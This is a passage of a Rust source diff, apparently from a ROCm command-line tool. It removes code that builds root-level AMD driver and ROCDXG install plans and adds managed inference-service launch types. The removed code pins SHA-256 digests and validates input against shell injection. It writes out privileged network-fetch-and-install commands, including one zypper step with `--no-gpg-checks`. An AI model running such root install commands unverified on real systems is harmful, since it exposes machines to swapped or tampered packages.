commands: Vec, - #[serde(default)] - reconciled_at_unix_ms: Option, - #[serde(default)] - reconciliation: Option, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -struct DriverReconciliationState { - at_unix_ms: u128, - driver: rocm_core::DriverSummary, - reboot_observed: bool, - #[serde(default)] - check_summary: DriverPassiveCheckSummary, - checks: Vec, -} - -#[derive(Debug, Clone, Serialize, Deserialize, Default)] -struct DriverPassiveCheckSummary { - total: usize, - present: usize, - missing: usize, +#[cfg(not(windows))] +fn managed_service_process_command(program: &Path, args: &[String]) -> ProcessCommand { + let mut command = ProcessCommand::new(program); + command.args(args); + command } -#[derive(Debug, Clone, Serialize, Deserialize)] -struct DriverPassiveCheck { - name: String, +/// Engine-neutral result of a managed launch. Returned rather than printed so the +/// caller can render it either as the rich deployment summary (interactive TTY) or +/// as the plain line-by-line form (piped output, chat assistant), from one code path. +struct ManagedLaunchReport { + service_id: String, + /// `http://host:port/v1`. + endpoint_url: String, + /// `"ready"` (inference confirmed), `"running"` (model listed but not serving + /// yet), `"starting"` (endpoint not answering), or the existing service's + /// status when nothing was spawned. status: String, - detail: String, + /// True when an equivalent service was already live and nothing was spawned. + already_running: bool, + child_pid: Option, + log_path: Option, + manifest_path: Option, } -/// Release of ROCDXG installed on WSL2, overridable for trying another build. -/// -/// Resolved once at plan-build time via [`resolve_shell_default_template`], the -/// same way `ROCM_CLI_AMDGPU_VERSION` is handled for the bare-metal repository -/// pin. The concrete value is baked into the archive name, the release URL and -/// the `repo_version:` line, so the plan a user reviews names the build the -/// install will actually fetch rather than an unexpanded `${...}` placeholder. -/// -/// How the default is chosen: the newest non-prerelease `librocdxg` release -/// whose `rocdxg-roct` digest is pinned in [`ROCDXG_PINNED_DIGESTS`]. Moving it -/// is two edits — add the `(version, digest)` row to that table, then change -/// the literal here — and the two must move together: a default with no row -/// makes [`resolve_rocdxg_verification`] refuse to build a plan at all unless -/// the caller supplies a digest, so a bump that forgets the table breaks every -/// default WSL install rather than falling back to the previous release. -/// -/// Deliberately out of scope: `rocdxg-amd-smi-lib__amd64.deb`, which -/// v1.2.1 and v1.2.2 ship alongside `rocdxg-roct` and the five releases before -/// them do not, is not installed here. It is a second prefix under -/// `/opt/rocm-wsl` carrying its own `amd-smi` and `libamd_smi.so`, and it -/// installs an `/etc/profile.d` entry that sources the package's own -/// `/opt/rocm-wsl/.env.sh`, which in turn prepends that prefix to `PATH` and -/// `LD_LIBRARY_PATH` for new login shells. That is a system-wide environment -/// change in service of a monitoring utility that neither `wsl_rocdxg_ready` -/// nor `rocm serve` depends on, and it is not available for every version in -/// the pinned table. Installing it is a separate decision that belongs behind -/// its own opt-in, not folded into the plan whose job is to supply the runtime -/// bridge. -const ROCDXG_VERSION_EXPR: &str = "${ROCM_CLI_ROCDXG_VERSION:-1.2.2}"; - -/// Supplies a SHA-256 digest for the ROCDXG package, overriding the pinned one. -/// Required when installing a version this build has no digest for. -const ROCDXG_SHA256_ENV: &str = "ROCM_CLI_ROCDXG_SHA256"; - -/// Opts out of digest verification entirely, when set to an affirmative value. -/// Named explicitly so that shipping an unverified root install is a deliberate -/// act with an audit trail in the plan, rather than what happens when a variable -/// is simply unset. -const ROCDXG_ALLOW_UNVERIFIED_ENV: &str = "ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED"; - -/// SHA-256 digests of the `rocdxg-roct` package shipped with each published -/// ROCDXG release, taken from the release host's own asset metadata. -/// -/// These exist so the default install is authenticated. The package is fetched -/// over plain HTTPS from a release page and then handed to `apt-get install`, -/// which runs its maintainer scripts as root — so without a digest, TLS to the -/// download host is the only thing standing between a compromised or swapped -/// artifact and root on the user's machine. That is materially weaker than the -/// bare-metal apt path in this same file, which installs from a repository -/// pinned with `signed-by=/etc/apt/keyrings/rocm.gpg`. -/// -/// A version absent from this table is not installed unless the caller supplies -/// a digest via `ROCM_CLI_ROCDXG_SHA256` or opts out via -/// `ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED`; see [`resolve_rocdxg_verification`]. -/// Add the new pair here when pinning a newer release. Nothing in the tree -/// checks a row against the published artifact, so a mistyped digest surfaces -/// only as a failed install on a WSL host — fail-closed, but confusing. Take -/// the value from the release's own asset metadata, or recompute it: -/// -/// ```text -/// curl -L --fail \ -/// https://github.com/ROCm/librocdxg/releases/download/v/rocdxg-roct__amd64.deb \ -/// | sha256sum -/// ``` -const ROCDXG_PINNED_DIGESTS: &[(&str, &str)] = &[ - ( - "1.0.0", - "5e78d300dfb8c10dfd57de24b312ff9f9962a3a971f571e5e9383e1c543b607a", - ), - ( - "1.1.0", - "d1f92415d218ca10df3c39f2ce48872ee968549a97191e987f2c2a79ab709f23", - ), - ( - "1.1.1", - "cd2ba9dbfd32bf35755a45e7e92410524f32baa2b4dcc31d0106876d04c3abcc", - ), - ( - "1.1.2", - "e426a5f58f4f177512a354ed5f0dd7b2c0a2b736f009e09bf806edf18ca6cb97", - ), - ( - "1.2.0", - "3ed9526719290cd8f590150dad8ea0f234fa779bea6a4c9a8449d7ae6b8cfb6e", - ), - ( - "1.2.1", - "7889eef45a1132ed2dde88d8ea1356bf791ec9c05802a18940bc81b970e850e0", - ), - ( - "1.2.2", - "28ded1254811192ebace1f76c0227580184af7b27ab2475fb9728295a702d541", - ), -]; - -/// Whether a resolved ROCDXG version is safe to place in the plan's commands. +/// Either an already-live service (nothing spawned) or a freshly spawned engine +/// child that is `running` but not yet HTTP-ready. /// -/// The driver plan is a list of shell lines run through `sh -c`, and the -/// version is interpolated into three of them — the archive name, the release -/// URL and the local path — each of which is then executed with `sudo` already -/// primed by an earlier `apt-get update`. `ROCM_CLI_ROCDXG_VERSION` reaches -/// this unchanged from the environment, so a value containing `;` or a -/// backtick would otherwise end the intended command and start an attacker's -/// own. Restricting it to characters that appear in a Debian package version -/// removes the possibility rather than trying to escape it. -fn rocdxg_version_is_well_formed(version: &str) -> bool { - !version.is_empty() - && version.starts_with(|c: char| c.is_ascii_alphanumeric()) - && version - .chars() - .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '+' | '-' | '~')) -} - -/// Whether a string is a bare lowercase 64-character hex SHA-256 digest, the -/// form `sha256sum -c -` expects. -fn sha256_digest_is_well_formed(digest: &str) -> bool { - digest.len() == 64 && digest.chars().all(|c| c.is_ascii_hexdigit()) -} - -/// How the downloaded ROCDXG package will be authenticated before it is -/// installed as root. -#[derive(Debug, Clone, Eq, PartialEq)] -enum RocdxgVerification { - /// Check the download against this digest and abort the install on a - /// mismatch. - Digest(String), - /// Install without checking, because the caller explicitly asked for it. - OptedOut, +/// Split out of [`start_managed_service`] so the attached (`--verbose` / +/// `--foreground`) serve path can spawn the very same detached child and stream +/// its log live from the first line — including startup — instead of blocking on +/// the readiness wait before any output appears. +enum ManagedSpawn { + AlreadyRunning(ManagedLaunchReport), + // `ManagedServiceRecord` is large; box it so the two variants stay a similar + // size (clippy::large_enum_variant). + Spawned { + record: Box, + child_pid: u32, + }, } -/// Decide how a ROCDXG download will be authenticated, or `Err` with the reason -/// no plan can be built. -/// -/// Resolution order — an explicit digest wins over the pinned one so a user can -/// install an artifact this build predates without having to disable -/// verification wholesale: -/// -/// 1. `ROCM_CLI_ROCDXG_SHA256`, when it is a well-formed digest. -/// 2. The digest pinned for this version in [`ROCDXG_PINNED_DIGESTS`]. -/// 3. `ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED`, when set to an affirmative value -/// — see [`crate::therock::truthy_env`] for the exact allowlist — which opts -/// out. `0` and `false` do not. -/// -/// Nothing left means refusal. Verification is therefore opt-*out*: the failure -/// mode of an unset variable is a plan that will not run, not a root install of -/// an unauthenticated package. -fn resolve_rocdxg_verification(version: &str) -> Result { - if let Some(supplied) = std::env::var(ROCDXG_SHA256_ENV) - .ok() - .map(|value| value.trim().to_ascii_lowercase()) - .filter(|value| !value.is_empty()) - { - if !sha256_digest_is_well_formed(&supplied) { - return Err(format!( - "{ROCDXG_SHA256_ENV} is not a 64-character hex SHA-256 digest; refusing to install ROCDXG without a usable digest." - )); - } - return Ok(RocdxgVerification::Digest(supplied)); - } +/// Spawn the detached engine child shared by the managed (background) and +/// attached (`--verbose`/`--foreground`) serve paths. Returns before the HTTP +/// readiness wait; callers decide whether to block on readiness +/// ([`start_managed_service`]) or start tailing the log immediately +/// ([`run_attached_service`]). +#[allow(clippy::too_many_arguments)] +fn spawn_managed_engine_child( + paths: &AppPaths, + engine: &str, + service_id: &str, + requested_model: &str, + resolve: &ResolveModelResponse, + host: &str, + port: u16, + device_policy: &DevicePolicy, + gpu_indices: &[u32], + runtime_id: Option<&str>, + env_id: Option<&str>, + engine_recipe: Option<&EngineRecipeHint>, + require_api_key: bool, +) -> Result { + paths.ensure()?; + fs::create_dir_all(paths.services_dir())?; - if let Some(pinned) = ROCDXG_PINNED_DIGESTS - .iter() - .find_map(|(pinned_version, digest)| (*pinned_version == version).then_some(*digest)) + // Idempotency guard: if a managed service for this engine+model is already + // alive, surface it and spawn nothing. A second `serve --managed` (e.g. the + // chat assistant re-issuing the same request) is treated as satisfied, not + // an error. Keyed on engine+canonical model — the freshly generated + // `service_id` is timestamp-unique and would never match an existing one. + // Stale/dead services fall through and relaunch normally. + let requested_recipe_json = engine_recipe + .map(serde_json::to_string) + .transpose() + .context("failed to encode engine recipe hint")?; + if let Some(existing) = + existing_live_managed_service(paths, engine, &resolve.canonical_model_id) { - return Ok(RocdxgVerification::Digest(pinned.to_owned())); - } - - // An allowlist of affirmative values, not "set to anything non-empty": - // otherwise `ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED=0` — which every reader takes - // for "off" — would turn digest checking off for a package installed as - // root. Anything this does not recognise leaves verification on. - if crate::therock::truthy_env(ROCDXG_ALLOW_UNVERIFIED_ENV) { - return Ok(RocdxgVerification::OptedOut); - } - - Err(format!( - "no known SHA-256 digest for ROCDXG {version}, and this package is installed as root. Set {ROCDXG_SHA256_ENV} to the digest published with that release, or set {ROCDXG_ALLOW_UNVERIFIED_ENV}=1 to install without verifying it." - )) -} - -/// A WSL plan that cannot be run, carrying the reason in the same shape every -/// other unsupported plan uses so `--dry-run`, the approval prompt and -/// `state.json` all report it identically. -fn wsl_rocdxg_refusal_plan(repo_version: String, reason: String) -> DriverInstallPlan { - DriverInstallPlan { - supported: false, - mutating: false, - policy: "wsl_rocdxg".to_owned(), - os_id: "wsl".to_owned(), - version_id: String::new(), - codename: String::new(), - repo_version, - reason, - preflight_checks: Vec::new(), - commands: Vec::new(), - checks: vec!["rocm examine".to_owned(), "rocm diagnose".to_owned()], - reboot_required: false, - } -} - -/// The `rocm install driver` plan for a WSL2 host. -/// -/// WSL2 has no in-tree amdgpu driver to install: the GPU comes from the Windows -/// host driver through `/dev/dxg`, and what ROCm needs on the Linux side is -/// ROCDXG (`librocdxg`), which bridges the runtime to it. Without that library -/// `rocm examine` reports `wsl_rocdxg_missing` and `rocm serve` refuses with -/// "no usable AMD GPU detected", even though a gfx target is detected — the -/// target is read from the Windows-side driver. -/// -/// This used to be a refusal pointing at a shell script under `scripts/`, which -/// ships only in a git checkout — never in the release bundle — so it was a dead -/// end for anyone who installed the CLI normally. These are that script's steps; -/// it has been removed rather than left as a second, untested copy of them. -fn wsl_rocdxg_driver_plan(escalation: PrivilegeEscalation) -> DriverInstallPlan { - let version = resolve_shell_default_template(ROCDXG_VERSION_EXPR); - if !rocdxg_version_is_well_formed(&version) { - return wsl_rocdxg_refusal_plan( - // The rejected value is still rendered into the plan's - // `repo_version:` line so the user can see what was refused — but - // that line is part of a plan a human reads to decide, and a raw - // value containing a newline could forge further lines in it. The - // debug form escapes newlines and makes trailing space visible, - // which is exactly what is wanted for a value being shown as - // rejected. - format!("{version:?}"), - "ROCM_CLI_ROCDXG_VERSION is not a well-formed package version. It is interpolated into privileged shell commands, so only letters, digits, and `. + - ~` are accepted.".to_owned(), - ); - } - let verification = match resolve_rocdxg_verification(&version) { - Ok(verification) => verification, - Err(reason) => return wsl_rocdxg_refusal_plan(version, reason), - }; - - let sudo = escalation.prefix(); - let deb = format!("rocdxg-roct_{version}_amd64.deb"); - let url = format!("https://github.com/ROCm/librocdxg/releases/download/v{version}/{deb}"); - let deb_path = format!("/tmp/{deb}"); - // `version` is validated above and the digest is hex, so neither can carry - // shell metacharacters; the quotes keep that guarantee local to the command - // rather than resting on a check several functions away. - let verify_download = match &verification { - RocdxgVerification::Digest(digest) => driver_command( - DriverCommandPhase::Execute, - &format!("printf '%s %s\\n' '{digest}' '{deb_path}' | sha256sum -c -"), - ), - RocdxgVerification::OptedOut => driver_command( - DriverCommandPhase::Execute, - &format!( - "echo 'warning: installing ROCDXG {version} without verifying it ({ROCDXG_ALLOW_UNVERIFIED_ENV} is set)' >&2" - ), - ), - }; - DriverInstallPlan { - supported: true, - mutating: true, - policy: "wsl_rocdxg".to_owned(), - os_id: "wsl".to_owned(), - version_id: String::new(), - codename: String::new(), - repo_version: version, - reason: - "WSL2 uses the Windows host driver plus ROCDXG, not Linux DKMS; this installs ROCDXG." - .to_owned(), - // Read, not run: the GPU plumbing belongs to the WSL platform, so if it - // is absent the fix is on the Windows side and no Linux package helps. - // The Execute phase fails on the same two paths rather than installing - // a library with nothing to bind to. - preflight_checks: { - let mut checks = vec![ - "/dev/dxg (WSL GPU device)".to_owned(), - "/usr/lib/wsl/lib/libdxcore.so (WSL dxcore runtime)".to_owned(), - ]; - checks.extend(driver_root_preflight_checks(escalation)); - checks - }, - commands: vec![ - driver_command( - DriverCommandPhase::Prepare, - "test -e /dev/dxg || { echo 'error: /dev/dxg is missing; WSL GPU plumbing is not available' >&2; exit 1; }", - ), - driver_command( - DriverCommandPhase::Prepare, - "test -e /usr/lib/wsl/lib/libdxcore.so || { echo 'error: /usr/lib/wsl/lib/libdxcore.so is missing' >&2; exit 1; }", - ), - // Say why up front rather than letting the first privileged step die - // with `sudo: command not found`, which reads like a broken plan. - // Skipped when already root: the plan emits no `sudo` at all then, - // so demanding the binary would state a precondition it is not - // relying on. - driver_command( - DriverCommandPhase::Prepare, - if escalation.needs_sudo_binary() { - "command -v sudo >/dev/null 2>&1 || { echo 'error: sudo is required to install ROCDXG under /opt/rocm' >&2; exit 1; }" - } else { - "test \"$(id -u)\" -eq 0 || { echo 'error: this plan was built to run as root' >&2; exit 1; }" - }, - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}apt-get update"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}apt-get install -y ca-certificates curl"), - ), - driver_command( - DriverCommandPhase::Execute, - &format!("curl -L --fail --show-error --output '{deb_path}' '{url}'"), - ), - // Authenticating the download is the whole trust anchor for this - // plan: everything after it runs the package's maintainer scripts - // as root. `sha256sum -c -` exits non-zero on a mismatch, which - // aborts the plan before the install step. - verify_download, - driver_command( - DriverCommandPhase::Execute, - &format!("{sudo}apt-get install -y '{deb_path}'"), - ), - driver_command(DriverCommandPhase::Execute, &format!("{sudo}ldconfig")), - driver_command( - DriverCommandPhase::Verify, - "test -e /opt/rocm/lib/librocdxg.so", - ), - driver_command( - DriverCommandPhase::Verify, - "ldconfig -p | grep -q 'librocdxg\\.so'", - ), - ], - // `rocm diagnose` carries the WSL catalog, including the host-side - // form that inspects a distro over `wsl.exe` without needing anything - // installed inside it. - checks: vec!["rocm examine".to_owned(), "rocm diagnose".to_owned()], - // Userspace only: `ldconfig` publishes the library in this boot. - reboot_required: false, - } -} - -fn build_driver_install_plan( - examine: &ExamineSummary, - os_release_text: &str, - dkms: bool, - escalation: PrivilegeEscalation, -) -> DriverInstallPlan { - // Resolve the AMD graphics version and amdgpu-install package release once, - // here at plan-build time, so the concrete values are baked into both the - // human-readable summary and every command the plan runs. Keeping shell - // `${VAR:-default}` templates in the commands used to be load-bearing, but - // AMD's apt `sources.list` line embeds the template inside POSIX single - // quotes, which suppress all expansion — so the literal `${...}` would land - // in the repo file. Resolving up front fixes that and keeps the summary and - // the executed commands in agreement. - let repo_version = resolve_shell_default_template("${ROCM_CLI_AMDGPU_VERSION:-7.2.4}"); - let package_release = - resolve_shell_default_template("${ROCM_CLI_AMDGPU_PACKAGE_RELEASE:-70204}"); - if examine.os == "windows" { - return DriverInstallPlan { - supported: false, - mutating: false, - policy: "windows_validate_only".to_owned(), - os_id: "windows".to_owned(), - version_id: String::new(), - codename: String::new(), - repo_version, - reason: "Windows driver install is validate-only in rocm-cli; use `rocm examine` to inspect the AMD display driver.".to_owned(), - preflight_checks: Vec::new(), - commands: Vec::new(), - checks: vec!["rocm examine".to_owned()], - reboot_required: true, - }; - } - if examine.wsl.as_ref().is_some_and(|wsl| wsl.is_wsl) { - return wsl_rocdxg_driver_plan(escalation); - } - - let os_id = parse_os_release_field(os_release_text, "ID").unwrap_or_default(); - let version_id = parse_os_release_field(os_release_text, "VERSION_ID").unwrap_or_default(); - let codename = parse_os_release_field(os_release_text, "VERSION_CODENAME") - .or_else(|| parse_os_release_field(os_release_text, "UBUNTU_CODENAME")) - .or_else(|| codename_for_version(&os_id, &version_id).map(str::to_owned)) - .unwrap_or_default(); - let id_like = parse_os_release_field(os_release_text, "ID_LIKE").unwrap_or_default(); - - match (os_id.as_str(), version_id.as_str()) { - ("ubuntu", "22.04" | "24.04") => apt_driver_plan( - os_id, - version_id, - codename, - repo_version, - dkms, - true, - escalation, - ), - ("debian", "12" | "13") => { - let repo_codename = if version_id == "13" { "noble" } else { "jammy" }; - let mut plan = apt_driver_plan( - os_id, - version_id, - repo_codename.to_owned(), - repo_version, - dkms, - false, - escalation, - ); - // Debian deliberately reuses AMD's Ubuntu-suite repository: AMD's - // documented Debian install maps Debian 12 -> jammy and 13 -> noble - // and serves them from the .../ubuntu graphics tree. Surface that in - // the plan so the Ubuntu codename on a Debian host doesn't read as a - // misdetection. - plan.reason = format!( - "Debian intentionally uses AMD's Ubuntu-suite repository (codename {repo_codename}), per AMD's documented Debian install; the Ubuntu codename is deliberate, not a misdetection. {}", - plan.reason - ); - plan - } - ("rhel", "10.1" | "10.0" | "9.7" | "9.6" | "9.4" | "8.10") => dnf_driver_plan( - os_id, - version_id, - codename, - repo_version, - package_release, - dkms, - DnfDriverDistro::Rhel, - escalation, - ), - ("ol", "10.1" | "9.7" | "8.10") => dnf_driver_plan( - os_id, - version_id, - codename, - repo_version, - package_release, - dkms, - DnfDriverDistro::Oracle, - escalation, - ), - ("rocky", "9.4" | "9.6" | "9.7") => dnf_driver_plan( - os_id, - version_id, - codename, - repo_version, - package_release, - dkms, - DnfDriverDistro::Rocky, - escalation, - ), - ("sles" | "sle", "15.7") => { - sles_driver_plan( - os_id, - version_id, - codename, - repo_version, - package_release, - dkms, - escalation, - ) - } - _ => driver_plan_via_id_like( - &os_id, - &version_id, - &id_like, - &codename, - &repo_version, - &package_release, - dkms, - escalation, - ) - .unwrap_or_else(|| DriverInstallPlan { - supported: false, - mutating: false, - policy: "unsupported_linux_dkms_plan".to_owned(), - os_id, - version_id, - codename, - repo_version, - reason: "Linux DKMS driver install is currently planned only for AMD-documented Ubuntu, Debian, RHEL, Oracle Linux, SLES, and Rocky versions; no commands were guessed for this distro.".to_owned(), - preflight_checks: Vec::new(), - commands: Vec::new(), - checks: vec!["rocm examine".to_owned()], - // Kernel module: not live until the machine comes back up. - reboot_required: true, - }), - } -} - -/// Select a driver install plan for a distro whose `/etc/os-release` `ID` is not -/// an AMD-documented distro, by falling back to its `ID_LIKE` base family. -/// -/// This mirrors the family resolution already used by the OpenMPI and system -/// dependency install plans in [`rocm_core::openmpi`], which honor `ID_LIKE`. A -/// derivative is matched only when its `VERSION_ID` aligns with an AMD-documented -/// version of the base family, so version-misaligned derivatives still fall -/// through to the unsupported plan rather than fabricating a repository URL that -/// would 404. -// Every parameter is one already-resolved fact the plan is templated from; -// bundling them into a struct would only move the same list one level out. -#[allow(clippy::too_many_arguments)] -fn driver_plan_via_id_like( - os_id: &str, - version_id: &str, - id_like: &str, - codename: &str, - repo_version: &str, - package_release: &str, - dkms: bool, - escalation: PrivilegeEscalation, -) -> Option { - let likes: Vec = id_like - .split_whitespace() - .map(str::to_ascii_lowercase) - .collect(); - let mentions = |family: &str| likes.iter().any(|like| like == family); - - // Ubuntu-family derivatives that reuse Ubuntu's VERSION_ID (e.g. Pop!_OS) - // also reuse its repositories; the amdgpu apt line always targets the - // `ubuntu/` repo, so the plan is identical to the Ubuntu base. - // Derivatives with their own version scheme (e.g. Linux Mint's "22") do not - // match here and remain unsupported rather than guessing a codename. - if mentions("ubuntu") && matches!(version_id, "22.04" | "24.04") { - let codename = if codename.is_empty() { - codename_for_version("ubuntu", version_id) - .unwrap_or_default() - .to_owned() - } else { - codename.to_owned() - }; - return Some(apt_driver_plan( - os_id.to_owned(), - version_id.to_owned(), - codename, - repo_version.to_owned(), - dkms, - true, - escalation, - )); - } - - // Debian-family derivatives that share Debian's version scheme map to the - // matching Ubuntu repo codename, exactly like the Debian base. - if mentions("debian") && matches!(version_id, "12" | "13") { - let repo_codename = if version_id == "13" { "noble" } else { "jammy" }; - return Some(apt_driver_plan( - os_id.to_owned(), - version_id.to_owned(), - repo_codename.to_owned(), - repo_version.to_owned(), - dkms, - false, - escalation, - )); - } - - // Enterprise-Linux rebuilds (e.g. AlmaLinux) reuse RHEL's version scheme and - // standard (RHCK, non-UEK) kernels, but are served from the vendor-neutral - // `el/` repository path rather than `rhel/`. Gate strictly on `ID_LIKE` - // naming `rhel`: Oracle Linux advertises only `ID_LIKE=fedora` and boots the - // UEK kernel, so it must keep its dedicated `("ol", ...)` flow and never be - // captured here with RHCK kernel commands that would fail to install. Guard - // the `ol`/`oracle` IDs explicitly as well, in case a future OL release adds - // `rhel` to `ID_LIKE`. - if mentions("rhel") && !matches!(os_id, "ol" | "oracle") && is_supported_el_version(version_id) - { - return Some(dnf_driver_plan( - os_id.to_owned(), - version_id.to_owned(), - codename.to_owned(), - repo_version.to_owned(), - package_release.to_owned(), - dkms, - DnfDriverDistro::Generic, - escalation, - )); - } - - // No SUSE-family fallback: SLES is matched exactly, and community rebuilds - // such as openSUSE Leap share the SLES version scheme but lack SUSEConnect - // entitlements, so the SLES plan's `SUSEConnect` commands would fail. They - // intentionally remain unsupported rather than producing a broken plan. - - None -} - -/// The set of Enterprise-Linux versions AMD documents for the driver install, -/// used to gate `ID_LIKE`-based matching of RHEL rebuilds. -fn is_supported_el_version(version_id: &str) -> bool { - matches!(version_id, "10.1" | "10.0" | "9.7" | "9.6" | "9.4" | "8.10") -} - -#[derive(Debug, Clone, Copy)] -enum DnfDriverDistro { - Rhel, - Oracle, - Rocky, - /// A RHEL rebuild matched via `ID_LIKE` (e.g. AlmaLinux, CentOS Stream): - /// standard RHEL kernels, served from the vendor-neutral `el/` repo path. - Generic, -} - -fn apt_driver_plan( - os_id: String, - version_id: String, - codename: String, - repo_version: String, - dkms: bool, - include_linux_modules_extra: bool, - escalation: PrivilegeEscalation, -) -> DriverInstallPlan { - // Empty when already root, so no command depends on a `sudo` binary that a - // container or minimal image very likely does not have. - let sudo = escalation.prefix(); - let mut commands = Vec::new(); - if dkms { - commands.extend([ - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}apt-get update"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}apt-get install -y ca-certificates curl gnupg"), - ), - ]); - let header_command = if include_linux_modules_extra { - format!( - "{sudo}apt-get install -y \"linux-headers-$(uname -r)\" \"linux-modules-extra-$(uname -r)\"" - ) - } else { - format!("{sudo}apt-get install -y \"linux-headers-$(uname -r)\"") - }; - commands.push(driver_command(DriverCommandPhase::Prepare, &header_command)); - commands.extend([ - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}install -m 0755 -d /etc/apt/keyrings"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!( - "curl -fsSL https://repo.radeon.com/rocm/rocm.gpg.key | {sudo}gpg --dearmor -o /etc/apt/keyrings/rocm.gpg" - ), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!( - "printf '%s\\n' 'deb [arch=amd64 signed-by=/etc/apt/keyrings/rocm.gpg] https://repo.radeon.com/graphics/{repo_version}/ubuntu {codename} main' | {sudo}tee /etc/apt/sources.list.d/amdgpu.list >/dev/null" - ), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!( - "printf '%s\\n' 'Package: *' 'Pin: release o=repo.radeon.com' 'Pin-Priority: 600' | {sudo}tee /etc/apt/preferences.d/rocm-pin-600 >/dev/null" - ), - ), - driver_command(DriverCommandPhase::Prepare, &format!("{sudo}apt-get update")), - ]); - commands.push(driver_command( - DriverCommandPhase::Execute, - &format!("{sudo}apt-get install -y amdgpu-dkms"), - )); - commands.extend([ - driver_command(DriverCommandPhase::Verify, "dkms status amdgpu"), - driver_command(DriverCommandPhase::Verify, "test -e /dev/kfd"), - driver_command( - DriverCommandPhase::Verify, - "ls /dev/dri/renderD* >/dev/null", - ), - ]); - } - - DriverInstallPlan { - supported: true, - mutating: dkms, - policy: "linux_official_amd_dkms_wrapper".to_owned(), - os_id, - version_id, - codename, - repo_version, - reason: if dkms { - "Plan uses AMD's package-manager DKMS flow and requires explicit approval before execution." - } else { - "DKMS was not requested; this is a non-mutating preflight plan." - } - .to_owned(), - preflight_checks: if dkms { - let mut checks = driver_root_preflight_checks(escalation); - checks.push("`apt-get` package manager is available".to_owned()); - checks - } else { - Vec::new() - }, - commands, - checks: vec![ - "dkms status amdgpu".to_owned(), - "/sys/module/amdgpu".to_owned(), - "/dev/kfd".to_owned(), - "/dev/dri/renderD*".to_owned(), - "amd-smi version if present".to_owned(), - "rocminfo if present".to_owned(), - ], - // Kernel module: not live until the machine comes back up. - reboot_required: true, - } -} - -// Same shape as the other distro plan builders: a flat list of resolved facts -// the command templates read, one of which is now the escalation prefix. -#[allow(clippy::too_many_arguments)] -fn dnf_driver_plan( - os_id: String, - version_id: String, - codename: String, - repo_version: String, - package_release: String, - dkms: bool, - distro: DnfDriverDistro, - escalation: PrivilegeEscalation, -) -> DriverInstallPlan { - // Empty when already root, so no command depends on a `sudo` binary that a - // container or minimal image very likely does not have. - let sudo = escalation.prefix(); - let mut commands = Vec::new(); - if dkms { - match distro { - DnfDriverDistro::Rhel | DnfDriverDistro::Generic => { - commands.extend( - rhel_kernel_prepare_commands(&version_id, escalation) - .into_iter() - .map(|command| driver_command(DriverCommandPhase::Prepare, &command)), - ); - } - DnfDriverDistro::Oracle => { - commands.push(driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}dnf install -y \"kernel-uek-devel-$(uname -r)\""), - )); - } - DnfDriverDistro::Rocky => { - commands.push(driver_command( - DriverCommandPhase::Prepare, - &format!( - "{sudo}dnf install -y kernel-headers kernel-devel kernel-devel-matched" - ), - )); - } - } - commands.push(driver_command( - DriverCommandPhase::Prepare, - &format!( - "{sudo}dnf install -y {}", - amdgpu_install_rpm_url(&repo_version, &package_release, &version_id, distro) - ), - )); - commands.push(driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}dnf clean all"), - )); - commands.push(driver_command( - DriverCommandPhase::Execute, - &format!("{sudo}dnf install -y amdgpu-dkms"), - )); - commands.extend([ - driver_command(DriverCommandPhase::Verify, "dkms status amdgpu"), - driver_command(DriverCommandPhase::Verify, "test -e /dev/kfd"), - driver_command( - DriverCommandPhase::Verify, - "ls /dev/dri/renderD* >/dev/null", - ), - ]); - } - - DriverInstallPlan { - supported: true, - mutating: dkms, - policy: "linux_official_amd_dkms_wrapper".to_owned(), - os_id, - version_id, - codename, - repo_version, - reason: if dkms { - "Plan uses AMD's documented DNF DKMS flow and requires explicit approval before execution." - } else { - "DKMS was not requested; this is a non-mutating preflight plan." - } - .to_owned(), - preflight_checks: if dkms { - let mut checks = driver_root_preflight_checks(escalation); - checks.push("`dnf` package manager is available".to_owned()); - checks.push( - "enterprise Linux repositories are registered and current before approval" - .to_owned(), - ); - checks - } else { - Vec::new() - }, - commands, - checks: vec![ - "dkms status amdgpu".to_owned(), - "/sys/module/amdgpu".to_owned(), - "/dev/kfd".to_owned(), - "/dev/dri/renderD*".to_owned(), - "amd-smi version if present".to_owned(), - "rocminfo if present".to_owned(), - ], - // Kernel module: not live until the machine comes back up. - reboot_required: true, - } -} - -fn sles_driver_plan( - os_id: String, - version_id: String, - codename: String, - repo_version: String, - package_release: String, - dkms: bool, - escalation: PrivilegeEscalation, -) -> DriverInstallPlan { - // Empty when already root, so no command depends on a `sudo` binary that a - // container or minimal image very likely does not have. - let sudo = escalation.prefix(); - let mut commands = Vec::new(); - if dkms { - commands.extend([ - driver_command( - DriverCommandPhase::Prepare, - &format!( - "{sudo}SUSEConnect -p sle-module-desktop-applications/{version_id}/x86_64" - ), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}SUSEConnect -p sle-module-development-tools/{version_id}/x86_64"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}SUSEConnect -p PackageHub/{version_id}/x86_64"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}zypper refresh"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}zypper install -y kernel-default-devel"), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!( - "{sudo}zypper --no-gpg-checks install -y {}", - amdgpu_install_sles_rpm_url(&repo_version, &package_release, &version_id) - ), - ), - driver_command( - DriverCommandPhase::Prepare, - &format!("{sudo}zypper refresh"), - ), - driver_command( - DriverCommandPhase::Execute, - &format!("{sudo}zypper install -y amdgpu-dkms"), - ), - driver_command(DriverCommandPhase::Verify, "dkms status amdgpu"), - driver_command(DriverCommandPhase::Verify, "test -e /dev/kfd"), - driver_command( - DriverCommandPhase::Verify, - "ls /dev/dri/renderD* >/dev/null", - ), - ]); - } - - DriverInstallPlan { - supported: 